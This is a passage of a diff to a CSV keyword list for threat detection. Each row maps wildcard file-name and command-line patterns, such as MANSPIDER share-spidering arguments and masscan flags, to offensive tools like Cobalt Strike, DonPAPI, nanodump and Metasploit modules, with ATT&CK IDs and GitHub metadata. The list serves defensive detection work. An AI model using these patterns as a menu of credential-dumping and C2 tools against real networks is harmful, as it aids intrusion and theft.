in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*malleable-c2-randomizer.py*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*MalleableProfileB64*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" 
"*MalleableProfiles.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" -"*malleable-redirector-config*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable-redirector-config*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*MalSCCM.exe*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*MalSCCM-main*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" -"*malware.NewConfig*","offensive_tool_keyword","KittyStager","KittyStager is 
a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*malwaredllc*","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8504","2072","2023-10-02T14:55:32Z","2017-12-18T09:10:12Z" -"*man_in_the_browser.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*man_spider.manspider:main*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*malware.NewConfig*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*malwaredllc*","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8506","2072","2023-10-02T14:55:32Z","2017-12-18T09:10:12Z" +"*man_in_the_browser.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*man_spider.manspider:main*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*ManagedEasyHook.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*manageengine_adselfservice_plus_cve_2022_28810.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*manageengine_xnode/CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*manager/keepass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*manager/mRemoteNG.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*mandiant/DueDLLigence*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*mandiant/gocrack*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - 
TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*manageengine_adselfservice_plus_cve_2022_28810.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manageengine_xnode/CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manager/keepass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*manager/mRemoteNG.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*mandiant/DueDLLigence*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*mandiant/gocrack*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*mandiant/msi-search*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege 
escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*mandllinject *","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" -"*manspider * -d * -u * -p *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider */24 -f *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*manspider * -d * -u * -p *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider */24 -f *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*manspider --threads * -d * -u * -H * --content admin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*manspider*--loot-dir*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider*--sharenames*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider.py*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider.spiderling*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*MANSPIDER-master*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*manspider*--loot-dir*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider*--sharenames*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.py*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.spiderling*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*MANSPIDER-master*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*map_payload_dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*map-get-tls-alternative-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*mapper_cve_exploit.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*masky_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*masscan -c *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*masscan --nmap*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*masscan -p*","offensive_tool_keyword","masscan","TCP port scanner. 
spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*masscan* -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masky_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*masscan -c *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan --nmap*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
